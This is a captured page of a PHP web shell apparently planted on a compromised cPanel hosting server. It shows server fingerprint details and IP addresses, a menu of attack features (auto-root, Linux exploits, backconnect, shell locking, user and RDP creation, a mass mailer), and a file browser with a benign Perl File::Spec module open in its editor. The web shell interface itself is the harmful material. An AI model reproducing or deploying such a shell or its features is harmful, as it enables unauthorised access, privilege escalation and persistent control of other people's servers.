Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.216.251
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl-base /
File /
[ HOME SHELL ]
Name
Size
Permission
Action
Spec
[ DIR ]
drwxr-xr-x
Basename.pm
5.3
KB
-rw-r--r--
Glob.pm
1.57
KB
-rw-r--r--
Path.pm
20.24
KB
-rw-r--r--
Spec.pm
556
B
-rw-r--r--
Temp.pm
83.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Spec.pm
package File::Spec; use strict; our $VERSION = '3.80'; $VERSION =~ tr/_//d; my %module = ( MSWin32 => 'Win32', os2 => 'OS2', VMS => 'VMS', NetWare => 'Win32', # Yes, File::Spec::Win32 works on NetWare. symbian => 'Win32', # Yes, File::Spec::Win32 works on symbian. dos => 'OS2', # Yes, File::Spec::OS2 works on DJGPP. cygwin => 'Cygwin', amigaos => 'AmigaOS'); my $module = $module{$^O} || 'Unix'; require "File/Spec/$module.pm"; our @ISA = ("File::Spec::$module"); 1; __END__
Close